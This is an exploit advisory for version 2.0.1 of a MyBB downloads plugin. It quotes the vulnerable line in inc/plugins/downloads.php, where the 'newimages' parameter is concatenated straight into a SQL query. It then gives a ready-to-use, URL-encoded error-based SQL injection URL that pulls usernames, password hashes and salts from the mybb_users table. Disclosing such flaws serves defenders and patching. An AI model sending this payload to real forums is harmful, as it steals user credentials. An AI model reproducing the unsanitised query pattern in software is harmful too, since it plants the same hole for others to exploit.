# Version: 2.0.1
Introduction
------------
Help in downloading files for MyBB forums.
SQL injection
-------------
inc/plugins/downloads.php L.30
1$qdownloads = $db->simple_select('downloads', '*', 'did="'.$mybb->input['newimages'].'"');
Proof of concept
----------------
error based injection: http://[site]/downloads.php?newimages=1%22%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28select%20concat%28username,%200x3a,%20password,%200x3a,%20salt,%200x3a%29%20from%20mybb_users%20limit%201%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29--%20-
Groucho